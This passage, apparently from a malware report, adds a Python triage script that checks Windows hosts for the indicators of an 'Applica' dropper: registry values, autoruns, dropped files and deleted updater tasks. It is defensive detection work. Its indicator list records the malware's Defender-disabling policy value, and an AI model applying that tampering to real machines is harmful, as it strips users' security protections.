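The manual steps above amount to a checklist of host artefacts, and the first thing a responder needs is a way to tell whether a given machine shows them. The script below is an added example, not Lavasoft's tooling: the registry values, file names and scheduled-task names are copied from this report; the snapshot layout (a dict with a "registry" map of "HIVE\path" to {value: data}, a "files" set and a "tasks" set), the SAMPLE_SNAPSHOT of an infected host, the SAMPLE_ENV paths and the severity scheme are this example's own assumptions. evaluate() works on any snapshot, so it runs off-box; collect_snapshot() fills one from a live Windows host with winreg and os.

```python
"""Host triage against the indicators this report lists (added example)."""
import os
import sys
from typing import Dict, List, Tuple

IOC_REGISTRY = {     # key -> {value name: data the dropper set}
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender": {"DisableAntiSpyware": 1},
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica": {"DisplayName": "Applica", "Publisher": "Dotdo"},
    r"HKLM\SOFTWARE\idot": {"idot": "ok"},
}
RUN_KEYS = (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
            r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run")
TRACING_KEYS = (r"HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32",
                r"HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASAPI32")
IOC_FILES = (r"%ProgramFiles%\applica\applica.exe", r"%ProgramFiles%\applica\uninstall.exe",
             r"%LOCALAPPDATA%\ddnow.exe", r"%LOCALAPPDATA%\ddnow4.exe", r"%LOCALAPPDATA%\dnow.exe",
             r"%LOCALAPPDATA%\dnow4.exe", r"%LOCALAPPDATA%\tinstall.exe", r"%LOCALAPPDATA%\tinstall4.exe",
             r"%LOCALAPPDATA%\setupok.exe", r"%LOCALAPPDATA%\run1.txt", r"%LOCALAPPDATA%\aatxtname.txt")
DELETED_TASKS = ("Adobe Flash Player Updater", "GoogleUpdateTaskMachineCore", "GoogleUpdateTaskMachineUA")


def expand(path: str, env: Dict[str, str]) -> str:
    """Expand %NAME% from the given mapping (not os.environ) and lower-case, so it works off-box."""
    for name, val in env.items():
        path = path.replace(f"%{name}%", val)
    return path.lower()


def evaluate(snap: dict, env: Dict[str, str]) -> List[Tuple[str, str]]:
    reg = {k.lower(): {v.lower(): d for v, d in vals.items()} for k, vals in snap["registry"].items()}
    files = {f.lower() for f in snap["files"]}
    findings = []
    for key, expected in IOC_REGISTRY.items():
        have = reg.get(key.lower(), {})
        for val, data in expected.items():
            if have.get(val.lower()) == data:
                findings.append(("high", f"{key}\\{val} = {data!r}"))
    for key in RUN_KEYS:                                  # any value name, the report's is "Applica"
        for val, data in reg.get(key.lower(), {}).items():
            if isinstance(data, str) and data.lower().endswith(r"\applica\applica.exe"):
                findings.append(("high", f"autorun {key}\\{val} -> {data}"))
    for key in TRACING_KEYS:                              # benign on its own: Windows creates it on RAS/WinInet use
        if key.lower() in reg:
            findings.append(("low", f"{key} present: the named process used network APIs"))
    for f in IOC_FILES:
        if expand(f, env) in files:
            findings.append(("high" if f.endswith(".exe") else "medium", f"file present: {f}"))
    for t in DELETED_TASKS:                               # absence is weak: the product may never have been installed
        if t not in snap["tasks"]:
            findings.append(("info", f"scheduled task missing: {t}"))
    return findings


def verdict(findings: List[Tuple[str, str]]) -> str:
    sev = {s for s, _ in findings}
    return "infected" if "high" in sev else "suspicious" if sev & {"medium", "low"} else "no indicators"


def collect_snapshot():
    """Read the same facts from a live host. 32-bit Python on 64-bit Windows sees WOW6432Node-redirected keys."""
    if sys.platform != "win32":
        raise RuntimeError("collect_snapshot() needs Windows; use evaluate() on a saved snapshot elsewhere")
    import winreg
    hives = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    registry = {}
    for key in list(IOC_REGISTRY) + list(RUN_KEYS) + list(TRACING_KEYS):
        hive, _, sub = key.partition("\\")
        try:
            with winreg.OpenKey(hives[hive], sub) as h:
                vals, i = {}, 0
                while True:
                    try:
                        name, data, _ = winreg.EnumValue(h, i)
                    except OSError:
                        break
                    vals[name] = data
                    i += 1
                registry[key] = vals
        except OSError:
            pass
    env = {"ProgramFiles": os.environ.get("ProgramFiles", r"C:\Program Files"),
           "LOCALAPPDATA": os.environ.get("LOCALAPPDATA", "")}
    files = {expand(f, env) for f in IOC_FILES if os.path.exists(expand(f, env))}
    tasks_dir = os.path.join(os.environ.get("SystemRoot", r"C:\Windows"), "System32", "Tasks")
    tasks = {t for t in DELETED_TASKS if os.path.exists(os.path.join(tasks_dir, t))}
    return {"registry": registry, "files": files, "tasks": tasks}, env


SAMPLE_ENV = {"ProgramFiles": r"C:\Program Files", "LOCALAPPDATA": r"C:\Users\alice\AppData\Local"}
SAMPLE_SNAPSHOT = {   # constructed: an infected Windows 7 host as this report describes it
    "registry": {
        r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender": {"DisableAntiSpyware": 1},
        r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica": {"DisplayName": "Applica", "Publisher": "Dotdo"},
        r"HKLM\SOFTWARE\idot": {"idot": "ok"},
        r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run": {"Applica": r"C:\Program Files\applica\applica.exe",
                                                                "SecurityHealth": r"C:\Windows\system32\SecurityHealthSystray.exe"},
        r"HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32": {"EnableFileTracing": 0},
    },
    "files": {r"C:\Program Files\applica\applica.exe", r"C:\Users\alice\AppData\Local\ddnow.exe",
              r"C:\Users\alice\AppData\Local\run1.txt"},
    "tasks": {"GoogleUpdateTaskMachineUA"},
}

if __name__ == "__main__":
    snap, env = collect_snapshot() if sys.platform == "win32" else (SAMPLE_SNAPSHOT, SAMPLE_ENV)
    found = evaluate(snap, env)
    for sev, text in found:
        print(f"[{sev}] {text}")
    print("verdict:", verdict(found))
```

Run it on the host before and after cleaning: the high findings map one-to-one onto the removal steps, the Tracing keys are reported at low severity because they only prove network API use, and missing updater tasks are informational only, since a host that never had Flash or Google Update installed would show the same absence.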